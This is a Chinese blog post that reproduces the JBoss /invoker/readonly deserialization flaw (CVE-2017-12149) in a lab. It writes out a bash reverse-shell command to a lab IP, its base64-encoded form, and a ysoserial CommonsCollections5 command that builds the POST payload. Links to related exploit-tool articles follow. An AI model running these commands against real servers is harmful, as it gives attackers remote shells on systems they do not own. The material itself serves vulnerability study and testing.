JBoss JMXInvokerServlet 反序列化漏洞

最新推荐文章于 2024-05-12 20:20:06 发布
最新推荐文章于 2024-05-12 20:20:06 发布
阅读量488 收藏
点赞数 1
分类专栏: 网络空间安全 文章标签: 安全漏洞 jboss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42687904/article/details/108144179
版权

JBoss JMXInvokerServlet 反序列化漏洞(CVE-2017-12149)

记一次JBoss反序列化漏洞复现过程
如图,搭建一个JBoss环境
(备注:CVE-2017-12149适用JBoss版本:5.x / 6.x)
在这里插入图片描述
漏洞原理:
该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化
编写反弹shell命令:
bash -i >& /dev/tcp/192.168.10.100/21 0>&1
由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码:
在这里插入图片描述(工具地址:http://www.jackson-t.ca/runtime-exec-payloads.html)

使用ysoserial来复现生成序列化数据:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwMC8yMSAwPiYx}|{base64,-d}|{bash,-i}” > poc.ser

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly
在这里插入图片描述

成功反弹shell

在这里插入图片描述
end

weixin_42687904
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jboss序列漏洞检测工具
02-15
jboss中间件的序列漏洞检测工具,可检测主机搭建的中间件并获得shell
Java序列漏洞利用工具.zip
04-10
标题"Java序列漏洞利用工具.zip"表明该压缩包内包含了针对Java序列漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
JBoss JMXInvokerServlet 序列漏洞(CVE-2015-7501和CVE-2017-12149)
来到了学渣的博客
08-29 5083
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。 CVE-2017-12149适用JBoss版本:5.x / 6.x 踩坑提醒:生成的ser文件最好在linux系统操作,windows会出现各种错误,甚至shell弹不回来。 步骤: 发现漏洞指纹→弹shell进行编码→用ysoserial把编码好的弹shell生ser文件→启动监听→用curl或
Jboss 序列 CVE-2017-12149
最新发布
npc88888的博客
05-12 415
JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列代码传入服务器进行序列,由于没有对序列操作进行任何检测,导致攻击者可以执行任意代码。
JBoss JMXInvokerServlet 序列漏洞复现
W小哥
05-26 1791
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 序列漏洞
qq_50854662的博客
09-17 351
JBoss JMXInvokerServlet 序列漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss序列漏洞JBoss在/invoker/JMXInvo..
JBoss JMXInvokerServlet 序列漏洞(CVE-2015-7501)
黑白的博客
12-21 2026
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss序列漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
java序列漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 弹shell部分更完美,不再加载远程war包,直接发包完成弹。 4. jboss回显执行命令部分利用异常抛出...
JBossMQJMS 序列漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 序列漏洞(CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理序列的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Java序列漏洞利用工具(WebLogic&Jboss
01-01
2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 弹shell部分更完美,不再加载远程war包,直接发包完成弹。 4. jboss回显执行命令部分利用异常抛...
JBOSS远程代码执行漏洞
Java web 开发专栏
01-09 842
JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入在输入框中写入war压缩
JBoss 5.x/6.x 序列漏洞 CVE-2017-12149 漏洞复现
ADummy的博客
03-03 362
JBoss 5.x/6.x 序列漏洞(CVE-2017-12149) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影
vulhub漏洞复现79_Jboss
weixin_44193247的博客
02-16 1616
vulhub漏洞复现练习篇
常见中间件漏洞复现(上)
Askshhbs的博客
04-26 1018
面试的时候会经常问关于中间件的漏洞,这里做一下漏洞的复现巩固一下 在虚拟机中安装docker环境具体就不演示了Vulhub - Docker-Compose file for vulnerability environment Tomcat漏洞 Tomcat 任意文件写入(CVE-2017-12615) 影响范围: Tomcat 7.0.0-7.0.81(默认配置) 测试环境:Apache Tomcat v8.5.39 漏洞本质:Tomcat配置文件/conf/web.xml 配置了可写(rea
jboss漏洞复现】CVE-2017-7504序列漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization序列漏洞
serendipity1130的博客
08-31 941
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列数据: javac -cp .:common
Java序列漏洞分析
abg49988的博客
10-15 1387
相关学习资料   http://www.freebuf.com/vuls/90840.html   https://security.tencent.com/index.php/blog/msg/97   http://www.tuicool.com/articles/ZvMbIne   http://www.freebuf.com/vuls/86566.html  ...
JBOSS序列漏洞
weixin_52206305的博客
07-05 3895
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss序列漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
jboss序列漏洞
08-16
JBoss序列漏洞是指JBoss应用服务器中存在的一种安全漏洞,具体表现为Java序列错误类型。该漏洞存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值